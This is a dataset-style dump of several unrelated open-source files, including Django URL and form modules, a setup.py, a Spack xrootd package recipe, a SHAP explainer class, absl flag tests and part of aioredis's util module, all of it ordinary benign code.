] | null | null | null | 4_utilization/utilization/urls.py | jhleed/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | 17 | 2019-09-09T00:15:36.000Z | 2021-01-28T13:08:51.000Z | """utilization URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
import accounts.views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('', accounts.views.index, name="index"),
path('accounts/', include('allauth.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 36.535714 | 77 | 0.723363 | from django.contrib import admin
from django.urls import path, include
import accounts.views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('', accounts.views.index, name="index"),
path('accounts/', include('allauth.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| true | true |
f72ed5096c5ea0ad4c05289c8b57172cf413b939 | 665 | py | Python | setup.py | Feneg/z5-tracker | 4631b33cc6584efcbd8df7e7d635d6ff0b7064fe | [
"MIT"
] | 2 | 2019-07-07T00:36:47.000Z | 2020-05-11T10:48:42.000Z | setup.py | Feneg/z5-tracker | 4631b33cc6584efcbd8df7e7d635d6ff0b7064fe | [
"MIT"
] | 5 | 2019-02-09T09:58:06.000Z | 2021-04-30T12:59:09.000Z | setup.py | Feneg/z5-tracker | 4631b33cc6584efcbd8df7e7d635d6ff0b7064fe | [
"MIT"
] | 1 | 2020-05-09T18:50:48.000Z | 2020-05-09T18:50:48.000Z | import setuptools
setuptools.setup(
name='z5-tracker',
version='1.2.1',
author='Feneg',
description='Helper program for Ocarina of Time randomiser',
url='https://www.github.com/feneg/z5-tracker',
packages=setuptools.find_packages(),
include_package_data=True,
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Topic :: Games/Entertainment',
'Topic :: Utilities'],
entry_points={
'gui_scripts': (
'z5-tracker = z5tracker.main:main',
'z5tracker = z5tracker.main:main')}
)
| 30.227273 | 64 | 0.607519 | import setuptools
setuptools.setup(
name='z5-tracker',
version='1.2.1',
author='Feneg',
description='Helper program for Ocarina of Time randomiser',
url='https://www.github.com/feneg/z5-tracker',
packages=setuptools.find_packages(),
include_package_data=True,
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Topic :: Games/Entertainment',
'Topic :: Utilities'],
entry_points={
'gui_scripts': (
'z5-tracker = z5tracker.main:main',
'z5tracker = z5tracker.main:main')}
)
| true | true |
f72ed55ad5ef38ef972e01b4b0f6447434a2d27e | 1,831 | py | Python | steambird/teacher/forms.py | rhbvkleef/SteamBird | 6dbbad0750ef918872da18b813669282885b8f95 | [
"BSD-3-Clause"
] | null | null | null | steambird/teacher/forms.py | rhbvkleef/SteamBird | 6dbbad0750ef918872da18b813669282885b8f95 | [
"BSD-3-Clause"
] | 22 | 2020-11-27T19:05:34.000Z | 2020-12-05T16:50:43.000Z | steambird/teacher/forms.py | rhbvkleef/SteamBird | 6dbbad0750ef918872da18b813669282885b8f95 | [
"BSD-3-Clause"
] | 1 | 2020-11-27T21:08:15.000Z | 2020-11-27T21:08:15.000Z | """
This module contains all forms used in the teacher Views
"""
from django import forms
from django.forms import HiddenInput, MultipleHiddenInput
from django.urls import reverse_lazy
from django_addanother.widgets import AddAnotherWidgetWrapper
from django_select2.forms import ModelSelect2MultipleWidget
from steambird.models.materials import StudyMaterialEdition
from steambird.models.msp import MSPLine
class PrefilledMSPLineForm(forms.ModelForm):
class Meta:
model = MSPLine
fields = [
"type",
"msp",
"comment",
"materials",
]
widgets = {
"msp": HiddenInput(),
"comment": HiddenInput(),
"materials": MultipleHiddenInput(),
"type": HiddenInput(),
}
class PrefilledSuggestAnotherMSPLineForm(forms.ModelForm):
class Meta:
model = MSPLine
fields = [
"type",
"msp",
"materials",
"comment",
]
widgets = {
"msp": HiddenInput(),
"type": HiddenInput(),
"materials": AddAnotherWidgetWrapper(ModelSelect2MultipleWidget(
queryset=StudyMaterialEdition.objects.all(),
search_fields=[
"name__icontains",
"book__ISBN__icontains",
"book__author__icontains",
"book__year_of_publishing__icontains",
"scientificarticle__DOI__icontains",
"scientificarticle__author__icontains",
"scientificarticle__year_of_publishing__icontains",
]
), reverse_lazy('material_management:material.create')),
# TODO: Convert this to a teacher:book.create view when it exists.
}
| 30.516667 | 78 | 0.588749 |
from django import forms
from django.forms import HiddenInput, MultipleHiddenInput
from django.urls import reverse_lazy
from django_addanother.widgets import AddAnotherWidgetWrapper
from django_select2.forms import ModelSelect2MultipleWidget
from steambird.models.materials import StudyMaterialEdition
from steambird.models.msp import MSPLine
class PrefilledMSPLineForm(forms.ModelForm):
class Meta:
model = MSPLine
fields = [
"type",
"msp",
"comment",
"materials",
]
widgets = {
"msp": HiddenInput(),
"comment": HiddenInput(),
"materials": MultipleHiddenInput(),
"type": HiddenInput(),
}
class PrefilledSuggestAnotherMSPLineForm(forms.ModelForm):
class Meta:
model = MSPLine
fields = [
"type",
"msp",
"materials",
"comment",
]
widgets = {
"msp": HiddenInput(),
"type": HiddenInput(),
"materials": AddAnotherWidgetWrapper(ModelSelect2MultipleWidget(
queryset=StudyMaterialEdition.objects.all(),
search_fields=[
"name__icontains",
"book__ISBN__icontains",
"book__author__icontains",
"book__year_of_publishing__icontains",
"scientificarticle__DOI__icontains",
"scientificarticle__author__icontains",
"scientificarticle__year_of_publishing__icontains",
]
), reverse_lazy('material_management:material.create')),
}
| true | true |
f72ed60ac026397d696947159bb11c0de6f0aad9 | 5,247 | py | Python | var/spack/repos/builtin/packages/xrootd/package.py | MiddelkoopT/spack | 4d94c4c4600f42a7a3bb3d06ec879140bc259304 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/xrootd/package.py | MiddelkoopT/spack | 4d94c4c4600f42a7a3bb3d06ec879140bc259304 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/xrootd/package.py | MiddelkoopT/spack | 4d94c4c4600f42a7a3bb3d06ec879140bc259304 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Xrootd(CMakePackage):
"""The XROOTD project aims at giving high performance, scalable fault
tolerant access to data repositories of many kinds."""
homepage = "http://xrootd.org"
url = "http://xrootd.org/download/v5.0.1/xrootd-5.0.1.tar.gz"
version('5.0.1', sha256='ff4462b0b61db4cc01dda0e26abdd78e43649ee7ac5e90f7a05b74328ff5ac83')
version('4.12.3', sha256='6f2ca1accc8d49d605706bb556777c753860bf46d845b1ee11393a5cb5987f15', preferred=True)
version('4.12.2', sha256='29f7bc3ea51b9d5d310eabd177152245d4160223325933c67f938ed5120f67bb')
version('4.12.1', sha256='7350d9196a26d17719b839fd242849e3995692fda25f242e67ac6ec907218d13')
version('4.12.0', sha256='69ef4732256d9a88127de4bfdf96bbf73348e0c70ce1d756264871a0ffadd2fc')
version('4.11.3', sha256='8e7a64fd55dfb452b6d5f76a9a97c493593943227b377623a3032da9197c7f65')
version('4.11.2', sha256='4620824db97fcc37dc3dd26110da8e5c3aab1d8302e4921d4f32e83207060603')
version('4.10.0', sha256='f07f85e27d72e9e8ff124173c7b53619aed8fcd36f9d6234c33f8f7fd511995b')
version('4.8.5', sha256='42e4d2cc6f8b442135f09bcc12c7be38b1a0c623a005cb5e69ff3d27997bdf73')
version('4.8.4', sha256='f148d55b16525567c0f893edf9bb2975f7c09f87f0599463e19e1b456a9d95ba')
version('4.8.3', sha256='9cd30a343758b8f50aea4916fa7bd37de3c37c5b670fe059ae77a8b2bbabf299')
version('4.8.2', sha256='8f28ec53e799d4aa55bd0cc4ab278d9762e0e57ac40a4b02af7fc53dcd1bef39')
version('4.8.1', sha256='edee2673d941daf7a6e5c963d339d4a69b4db5c4b6f77b4548b3129b42198029')
version('4.8.0', sha256='0b59ada295341902ca01e9d23e29780fb8df99a6d2bd1c2d654e9bb70c877ad8')
version('4.7.1', sha256='90ddc7042f05667045b06e02c8d9c2064c55d9a26c02c50886254b8df85fc577')
version('4.7.0', sha256='6cc69d9a3694e8dcf2392e9c3b518bd2497a89b3a9f25ffaec62efa52170349b')
version('4.6.1', sha256='0261ce760e8788f85d68918d7702ae30ec677a8f331dae14adc979b4cc7badf5')
version('4.6.0', sha256='b50f7c64ed2a4aead987de3fdf6fce7ee082407ba9297b6851cd917db72edd1d')
version('4.5.0', sha256='27a8e4ef1e6bb6bfe076fef50afe474870edd198699d43359ef01de2f446c670')
version('4.4.1', sha256='3c295dbf750de086c04befc0d3c7045fd3976611c2e75987c1477baca37eb549')
version('4.4.0', sha256='f066e7488390c0bc50938d23f6582fb154466204209ca92681f0aa06340e77c8')
version('4.3.0', sha256='d34865772d975b5d58ad80bb05312bf49aaf124d5431e54dc8618c05a0870e3c')
variant('http', default=True,
description='Build with HTTP support')
variant('python', default=False,
description='Build pyxroot Python extension')
variant('readline', default=True,
description='Use readline')
variant('cxxstd',
default='11',
values=('98', '11', '14', '17'),
multi=False,
description='Use the specified C++ standard when building.')
conflicts('cxxstd=98', when='@4.7.0:')
depends_on('bzip2')
depends_on('cmake@2.6:', type='build')
depends_on('libxml2', when='+http')
depends_on('uuid', when="@4.11.0:")
depends_on('openssl')
depends_on('python', when='+python')
depends_on('readline', when='+readline')
depends_on('xz')
depends_on('zlib')
extends('python', when='+python')
patch('python-support.patch', level=1, when='@:4.8.99+python')
def patch(self):
"""Remove hardcoded -std=c++0x flag
"""
if self.spec.satisfies('@4.7.0:'):
filter_file(r'\-std=c\+\+0x', r'', 'cmake/XRootDOSDefs.cmake')
def cmake_args(self):
spec = self.spec
options = [
'-DENABLE_HTTP:BOOL={0}'.
format('ON' if '+http' in spec else 'OFF'),
'-DENABLE_PYTHON:BOOL={0}'.
format('ON' if '+python' in spec else 'OFF'),
'-DENABLE_READLINE:BOOL={0}'.
format('ON' if '+readline' in spec else 'OFF'),
'-DENABLE_CEPH:BOOL=OFF'
]
# see https://github.com/spack/spack/pull/11581
if '+python' in self.spec:
options.append('-DPYTHON_EXECUTABLE=%s' %
spec['python'].command.path)
return options
def setup_build_environment(self, env):
cxxstdflag = ''
if self.spec.variants['cxxstd'].value == '98':
cxxstdflag = self.compiler.cxx98_flag
elif self.spec.variants['cxxstd'].value == '11':
cxxstdflag = self.compiler.cxx11_flag
elif self.spec.variants['cxxstd'].value == '14':
cxxstdflag = self.compiler.cxx14_flag
elif self.spec.variants['cxxstd'].value == '17':
cxxstdflag = self.compiler.cxx17_flag
else:
# The user has selected a (new?) legal value that we've
# forgotten to deal with here.
tty.die(
"INTERNAL ERROR: cannot accommodate unexpected variant ",
"cxxstd={0}".format(self.spec.variants['cxxstd'].value))
if cxxstdflag:
env.append_flags('CXXFLAGS', cxxstdflag)
| 46.848214 | 112 | 0.684772 |
from spack import *
class Xrootd(CMakePackage):
homepage = "http://xrootd.org"
url = "http://xrootd.org/download/v5.0.1/xrootd-5.0.1.tar.gz"
version('5.0.1', sha256='ff4462b0b61db4cc01dda0e26abdd78e43649ee7ac5e90f7a05b74328ff5ac83')
version('4.12.3', sha256='6f2ca1accc8d49d605706bb556777c753860bf46d845b1ee11393a5cb5987f15', preferred=True)
version('4.12.2', sha256='29f7bc3ea51b9d5d310eabd177152245d4160223325933c67f938ed5120f67bb')
version('4.12.1', sha256='7350d9196a26d17719b839fd242849e3995692fda25f242e67ac6ec907218d13')
version('4.12.0', sha256='69ef4732256d9a88127de4bfdf96bbf73348e0c70ce1d756264871a0ffadd2fc')
version('4.11.3', sha256='8e7a64fd55dfb452b6d5f76a9a97c493593943227b377623a3032da9197c7f65')
version('4.11.2', sha256='4620824db97fcc37dc3dd26110da8e5c3aab1d8302e4921d4f32e83207060603')
version('4.10.0', sha256='f07f85e27d72e9e8ff124173c7b53619aed8fcd36f9d6234c33f8f7fd511995b')
version('4.8.5', sha256='42e4d2cc6f8b442135f09bcc12c7be38b1a0c623a005cb5e69ff3d27997bdf73')
version('4.8.4', sha256='f148d55b16525567c0f893edf9bb2975f7c09f87f0599463e19e1b456a9d95ba')
version('4.8.3', sha256='9cd30a343758b8f50aea4916fa7bd37de3c37c5b670fe059ae77a8b2bbabf299')
version('4.8.2', sha256='8f28ec53e799d4aa55bd0cc4ab278d9762e0e57ac40a4b02af7fc53dcd1bef39')
version('4.8.1', sha256='edee2673d941daf7a6e5c963d339d4a69b4db5c4b6f77b4548b3129b42198029')
version('4.8.0', sha256='0b59ada295341902ca01e9d23e29780fb8df99a6d2bd1c2d654e9bb70c877ad8')
version('4.7.1', sha256='90ddc7042f05667045b06e02c8d9c2064c55d9a26c02c50886254b8df85fc577')
version('4.7.0', sha256='6cc69d9a3694e8dcf2392e9c3b518bd2497a89b3a9f25ffaec62efa52170349b')
version('4.6.1', sha256='0261ce760e8788f85d68918d7702ae30ec677a8f331dae14adc979b4cc7badf5')
version('4.6.0', sha256='b50f7c64ed2a4aead987de3fdf6fce7ee082407ba9297b6851cd917db72edd1d')
version('4.5.0', sha256='27a8e4ef1e6bb6bfe076fef50afe474870edd198699d43359ef01de2f446c670')
version('4.4.1', sha256='3c295dbf750de086c04befc0d3c7045fd3976611c2e75987c1477baca37eb549')
version('4.4.0', sha256='f066e7488390c0bc50938d23f6582fb154466204209ca92681f0aa06340e77c8')
version('4.3.0', sha256='d34865772d975b5d58ad80bb05312bf49aaf124d5431e54dc8618c05a0870e3c')
variant('http', default=True,
description='Build with HTTP support')
variant('python', default=False,
description='Build pyxroot Python extension')
variant('readline', default=True,
description='Use readline')
variant('cxxstd',
default='11',
values=('98', '11', '14', '17'),
multi=False,
description='Use the specified C++ standard when building.')
conflicts('cxxstd=98', when='@4.7.0:')
depends_on('bzip2')
depends_on('cmake@2.6:', type='build')
depends_on('libxml2', when='+http')
depends_on('uuid', when="@4.11.0:")
depends_on('openssl')
depends_on('python', when='+python')
depends_on('readline', when='+readline')
depends_on('xz')
depends_on('zlib')
extends('python', when='+python')
patch('python-support.patch', level=1, when='@:4.8.99+python')
def patch(self):
if self.spec.satisfies('@4.7.0:'):
filter_file(r'\-std=c\+\+0x', r'', 'cmake/XRootDOSDefs.cmake')
def cmake_args(self):
spec = self.spec
options = [
'-DENABLE_HTTP:BOOL={0}'.
format('ON' if '+http' in spec else 'OFF'),
'-DENABLE_PYTHON:BOOL={0}'.
format('ON' if '+python' in spec else 'OFF'),
'-DENABLE_READLINE:BOOL={0}'.
format('ON' if '+readline' in spec else 'OFF'),
'-DENABLE_CEPH:BOOL=OFF'
]
if '+python' in self.spec:
options.append('-DPYTHON_EXECUTABLE=%s' %
spec['python'].command.path)
return options
def setup_build_environment(self, env):
cxxstdflag = ''
if self.spec.variants['cxxstd'].value == '98':
cxxstdflag = self.compiler.cxx98_flag
elif self.spec.variants['cxxstd'].value == '11':
cxxstdflag = self.compiler.cxx11_flag
elif self.spec.variants['cxxstd'].value == '14':
cxxstdflag = self.compiler.cxx14_flag
elif self.spec.variants['cxxstd'].value == '17':
cxxstdflag = self.compiler.cxx17_flag
else:
# forgotten to deal with here.
tty.die(
"INTERNAL ERROR: cannot accommodate unexpected variant ",
"cxxstd={0}".format(self.spec.variants['cxxstd'].value))
if cxxstdflag:
env.append_flags('CXXFLAGS', cxxstdflag)
| true | true |
f72ed67b5fe1b20f3cdf6654c9891e80bdd774e0 | 2,002 | py | Python | shapSD/feature_explainer/global_explainer.py | XiaoqiMa/shapSD | 545f61c9e8329c7271051f22f99ba32508ba74a1 | [
"MIT"
] | 2 | 2019-06-26T21:31:03.000Z | 2019-06-27T16:59:58.000Z | shapSD/feature_explainer/global_explainer.py | XiaoqiMa/shapSD | 545f61c9e8329c7271051f22f99ba32508ba74a1 | [
"MIT"
] | null | null | null | shapSD/feature_explainer/global_explainer.py | XiaoqiMa/shapSD | 545f61c9e8329c7271051f22f99ba32508ba74a1 | [
"MIT"
] | null | null | null | """
provide global explanation methods
author: Xiaoqi
date: 2019.10.29
"""
from .feature_importance import *
from .shap_explainer import ShapExplainer
class GlobalExplainer(object):
def __init__(self, x_train, y_train, model):
"""
Initialize a feature global explainer
:param x_train: input data
:param y_train: output data
:param model: the underlying black-box model to be interpreted
"""
self.x_train = x_train
self.y_train = y_train
self.model = model
def permutation_importance(self, use_eli5=False):
"""
Global variable influence measured by permutation importance
:param use_eli5: bool, if True, use the ELI5 implementation, otherwise the raw implementation
:return: feature importance ranking plot
"""
feature_imp = FeatureImportance(self.x_train, self.y_train, self.model)
if use_eli5:
return feature_imp.eli5_perm_importance()
else:
imp = feature_imp.permutation_importance()
return feature_imp.vis_perm_importance(imp)
def weights_importance(self):
"""
Global variable influence measured by feature weights
:return: an explanation of estimator parameters (weights)
"""
feature_imp = FeatureImportance(self.x_train, self.y_train, self.model)
return feature_imp.eli5_weights_importance(show=['feature_importances', 'target', 'description'])
def shap_feature_importance(self, explainer_type='Tree', background_sample=500):
"""
Global variable influence measured by SHAP feature importance (average absolute marginal
effect of each feature)
:return: a summary plot visualized using SHAP
"""
tree_shap = ShapExplainer(self.x_train, self.model, explainer_type=explainer_type,
background_sample=background_sample)
return tree_shap.shap_summary_plot(plot_type='bar')
| 37.773585 | 105 | 0.676823 | from .feature_importance import *
from .shap_explainer import ShapExplainer
class GlobalExplainer(object):
def __init__(self, x_train, y_train, model):
self.x_train = x_train
self.y_train = y_train
self.model = model
def permutation_importance(self, use_eli5=False):
feature_imp = FeatureImportance(self.x_train, self.y_train, self.model)
if use_eli5:
return feature_imp.eli5_perm_importance()
else:
imp = feature_imp.permutation_importance()
return feature_imp.vis_perm_importance(imp)
def weights_importance(self):
feature_imp = FeatureImportance(self.x_train, self.y_train, self.model)
return feature_imp.eli5_weights_importance(show=['feature_importances', 'target', 'description'])
def shap_feature_importance(self, explainer_type='Tree', background_sample=500):
tree_shap = ShapExplainer(self.x_train, self.model, explainer_type=explainer_type,
background_sample=background_sample)
return tree_shap.shap_summary_plot(plot_type='bar')
| true | true |
f72ed6bd8cbd39180af1615ae392cf981ff63a32 | 4,411 | py | Python | absl/flags/tests/_flag_test.py | alexhagen/abseil-py | 240f85b0fa45acd95ca0157146245e7fb5453337 | [
"Apache-2.0"
] | null | null | null | absl/flags/tests/_flag_test.py | alexhagen/abseil-py | 240f85b0fa45acd95ca0157146245e7fb5453337 | [
"Apache-2.0"
] | null | null | null | absl/flags/tests/_flag_test.py | alexhagen/abseil-py | 240f85b0fa45acd95ca0157146245e7fb5453337 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 The Abseil Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Additional tests for Flag classes.
Most of the Flag classes are covered in the flags_test.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl._enum_module import enum
from absl.flags import _argument_parser
from absl.flags import _exceptions
from absl.flags import _flag
from absl.testing import absltest
from absl.testing import parameterized
class FlagTest(absltest.TestCase):
def setUp(self):
self.flag = _flag.Flag(
_argument_parser.ArgumentParser(),
_argument_parser.ArgumentSerializer(),
'fruit', 'apple', 'help')
def test_default_unparsed(self):
flag = _flag.Flag(
_argument_parser.ArgumentParser(),
_argument_parser.ArgumentSerializer(),
'fruit', 'apple', 'help')
self.assertEqual('apple', flag.default_unparsed)
flag = _flag.Flag(
_argument_parser.IntegerParser(),
_argument_parser.ArgumentSerializer(),
'number', '1', 'help')
self.assertEqual('1', flag.default_unparsed)
flag = _flag.Flag(
_argument_parser.IntegerParser(),
_argument_parser.ArgumentSerializer(),
'number', 1, 'help')
self.assertEqual(1, flag.default_unparsed)
def test_set_default_overrides_current_value(self):
self.assertEqual('apple', self.flag.value)
self.flag._set_default('orange')
self.assertEqual('orange', self.flag.value)
def test_set_default_overrides_current_value_when_not_using_default(self):
self.flag.using_default_value = False
self.assertEqual('apple', self.flag.value)
self.flag._set_default('orange')
self.assertEqual('apple', self.flag.value)
class BooleanFlagTest(parameterized.TestCase):
@parameterized.parameters(('', '(no help available)'),
('Is my test brilliant?', 'Is my test brilliant?'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.BooleanFlag('a_bool', False, helptext_input)
self.assertEqual(helptext_output, f.help)
class EnumFlagTest(parameterized.TestCase):
@parameterized.parameters(
('', '<apple|orange>: (no help available)'),
('Type of fruit.', '<apple|orange>: Type of fruit.'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.EnumFlag('fruit', 'apple', helptext_input, ['apple', 'orange'])
self.assertEqual(helptext_output, f.help)
def test_empty_values(self):
with self.assertRaises(ValueError):
_flag.EnumFlag('fruit', None, 'help', [])
class Fruit(enum.Enum):
APPLE = 1
ORANGE = 2
class EmptyEnum(enum.Enum):
pass
class EnumClassFlagTest(parameterized.TestCase):
@parameterized.parameters(
('', '<APPLE|ORANGE>: (no help available)'),
('Type of fruit.', '<APPLE|ORANGE>: Type of fruit.'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.EnumClassFlag('fruit', None, helptext_input, Fruit)
self.assertEqual(helptext_output, f.help)
def test_requires_enum(self):
with self.assertRaises(TypeError):
_flag.EnumClassFlag('fruit', None, 'help', ['apple', 'orange'])
def test_requires_non_empty_enum_class(self):
with self.assertRaises(ValueError):
_flag.EnumClassFlag('empty', None, 'help', EmptyEnum)
def test_accepts_literal_default(self):
f = _flag.EnumClassFlag('fruit', Fruit.APPLE, 'A sample enum flag.', Fruit)
self.assertEqual(Fruit.APPLE, f.value)
def test_accepts_string_default(self):
f = _flag.EnumClassFlag('fruit', 'ORANGE', 'A sample enum flag.', Fruit)
self.assertEqual(Fruit.ORANGE, f.value)
def test_default_value_does_not_exist(self):
with self.assertRaises(_exceptions.IllegalFlagValueError):
_flag.EnumClassFlag('fruit', 'BANANA', 'help', Fruit)
if __name__ == '__main__':
absltest.main()
| 32.674074 | 79 | 0.717751 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl._enum_module import enum
from absl.flags import _argument_parser
from absl.flags import _exceptions
from absl.flags import _flag
from absl.testing import absltest
from absl.testing import parameterized
class FlagTest(absltest.TestCase):
def setUp(self):
self.flag = _flag.Flag(
_argument_parser.ArgumentParser(),
_argument_parser.ArgumentSerializer(),
'fruit', 'apple', 'help')
def test_default_unparsed(self):
flag = _flag.Flag(
_argument_parser.ArgumentParser(),
_argument_parser.ArgumentSerializer(),
'fruit', 'apple', 'help')
self.assertEqual('apple', flag.default_unparsed)
flag = _flag.Flag(
_argument_parser.IntegerParser(),
_argument_parser.ArgumentSerializer(),
'number', '1', 'help')
self.assertEqual('1', flag.default_unparsed)
flag = _flag.Flag(
_argument_parser.IntegerParser(),
_argument_parser.ArgumentSerializer(),
'number', 1, 'help')
self.assertEqual(1, flag.default_unparsed)
def test_set_default_overrides_current_value(self):
self.assertEqual('apple', self.flag.value)
self.flag._set_default('orange')
self.assertEqual('orange', self.flag.value)
def test_set_default_overrides_current_value_when_not_using_default(self):
self.flag.using_default_value = False
self.assertEqual('apple', self.flag.value)
self.flag._set_default('orange')
self.assertEqual('apple', self.flag.value)
class BooleanFlagTest(parameterized.TestCase):
@parameterized.parameters(('', '(no help available)'),
('Is my test brilliant?', 'Is my test brilliant?'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.BooleanFlag('a_bool', False, helptext_input)
self.assertEqual(helptext_output, f.help)
class EnumFlagTest(parameterized.TestCase):
@parameterized.parameters(
('', '<apple|orange>: (no help available)'),
('Type of fruit.', '<apple|orange>: Type of fruit.'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.EnumFlag('fruit', 'apple', helptext_input, ['apple', 'orange'])
self.assertEqual(helptext_output, f.help)
def test_empty_values(self):
with self.assertRaises(ValueError):
_flag.EnumFlag('fruit', None, 'help', [])
class Fruit(enum.Enum):
APPLE = 1
ORANGE = 2
class EmptyEnum(enum.Enum):
pass
class EnumClassFlagTest(parameterized.TestCase):
@parameterized.parameters(
('', '<APPLE|ORANGE>: (no help available)'),
('Type of fruit.', '<APPLE|ORANGE>: Type of fruit.'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.EnumClassFlag('fruit', None, helptext_input, Fruit)
self.assertEqual(helptext_output, f.help)
def test_requires_enum(self):
with self.assertRaises(TypeError):
_flag.EnumClassFlag('fruit', None, 'help', ['apple', 'orange'])
def test_requires_non_empty_enum_class(self):
with self.assertRaises(ValueError):
_flag.EnumClassFlag('empty', None, 'help', EmptyEnum)
def test_accepts_literal_default(self):
f = _flag.EnumClassFlag('fruit', Fruit.APPLE, 'A sample enum flag.', Fruit)
self.assertEqual(Fruit.APPLE, f.value)
def test_accepts_string_default(self):
f = _flag.EnumClassFlag('fruit', 'ORANGE', 'A sample enum flag.', Fruit)
self.assertEqual(Fruit.ORANGE, f.value)
def test_default_value_does_not_exist(self):
with self.assertRaises(_exceptions.IllegalFlagValueError):
_flag.EnumClassFlag('fruit', 'BANANA', 'help', Fruit)
if __name__ == '__main__':
absltest.main()
| true | true |
f72ed6f3f3b067f75edf1591df918110a3cd1d90 | 71 | py | Python | bin/run.py | Team-De-bug/Anti-Viral-Protocol | 6b8634432bfddda581aff6112a5b96fc1b9df5fd | [
"MIT"
] | 1 | 2022-01-28T03:54:19.000Z | 2022-01-28T03:54:19.000Z | bin/run.py | Team-De-bug/Anti-Viral-Protocol | 6b8634432bfddda581aff6112a5b96fc1b9df5fd | [
"MIT"
] | null | null | null | bin/run.py | Team-De-bug/Anti-Viral-Protocol | 6b8634432bfddda581aff6112a5b96fc1b9df5fd | [
"MIT"
] | 1 | 2022-02-17T19:57:45.000Z | 2022-02-17T19:57:45.000Z | #!/usr/bin/env python
from anti_viral_protocol import main
main.run()
| 14.2 | 36 | 0.774648 |
from anti_viral_protocol import main
main.run()
| true | true |
f72ed76a2412ba2f6fbe6587e6f523c5dadb2346 | 6,881 | py | Python | aioredis/util.py | tclarke/aioredis | d42dd9144ea376b8230786040972419b3ffab3c6 | [
"MIT"
] | null | null | null | aioredis/util.py | tclarke/aioredis | d42dd9144ea376b8230786040972419b3ffab3c6 | [
"MIT"
] | null | null | null | aioredis/util.py | tclarke/aioredis | d42dd9144ea376b8230786040972419b3ffab3c6 | [
"MIT"
] | null | null | null | import asyncio
import sys
from urllib.parse import urlparse, parse_qsl
from .log import logger
_NOTSET = object()
IS_PY38 = sys.version_info >= (3, 8)
# NOTE: never put here anything else;
# just this basic types
_converters = {
bytes: lambda val: val,
bytearray: lambda val: val,
str: lambda val: val.encode(),
int: lambda val: b'%d' % val,
float: lambda val: b'%r' % val,
}
def encode_command(*args, buf=None):
"""Encodes arguments into redis bulk-strings array.
Raises TypeError if any of args not of bytearray, bytes, float, int, or str
type.
"""
if buf is None:
buf = bytearray()
buf.extend(b'*%d\r\n' % len(args))
try:
for arg in args:
barg = _converters[type(arg)](arg)
buf.extend(b'$%d\r\n%s\r\n' % (len(barg), barg))
except KeyError:
raise TypeError("Argument {!r} expected to be of bytearray, bytes,"
" float, int, or str type".format(arg))
return buf
def decode(obj, encoding, errors):
if errors is None:
errors = 'strict'
if isinstance(obj, bytes):
return obj.decode(encoding, errors)
elif isinstance(obj, list):
return [decode(o, encoding, errors) for o in obj]
return obj
async def wait_ok(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
return res in (b'OK', 'OK')
async def wait_convert(fut, type_, **kwargs):
result = await fut
if result in (b'QUEUED', 'QUEUED'):
return result
return type_(result, **kwargs)
async def wait_make_dict(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
it = iter(res)
return dict(zip(it, it))
class coerced_keys_dict(dict):
def __getitem__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__getitem__(self, other)
def __contains__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__contains__(self, other)
class _ScanIter:
__slots__ = ('_scan', '_cur', '_ret')
def __init__(self, scan):
self._scan = scan
self._cur = b'0'
self._ret = []
def __aiter__(self):
return self
async def __anext__(self):
while not self._ret and self._cur:
self._cur, self._ret = await self._scan(self._cur)
if not self._cur and not self._ret:
raise StopAsyncIteration # noqa
else:
ret = self._ret.pop(0)
return ret
def _set_result(fut, result, *info):
if fut.done():
logger.debug("Waiter future is already done %r %r", fut, info)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, result, info)
else:
fut.set_result(result)
def _set_exception(fut, exception):
if fut.done():
logger.debug("Waiter future is already done %r", fut)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, exception)
else:
fut.set_exception(exception)
def parse_url(url):
"""Parse Redis connection URI.
Parse according to IANA specs:
* https://www.iana.org/assignments/uri-schemes/prov/redis
* https://www.iana.org/assignments/uri-schemes/prov/rediss
Also more rules applied:
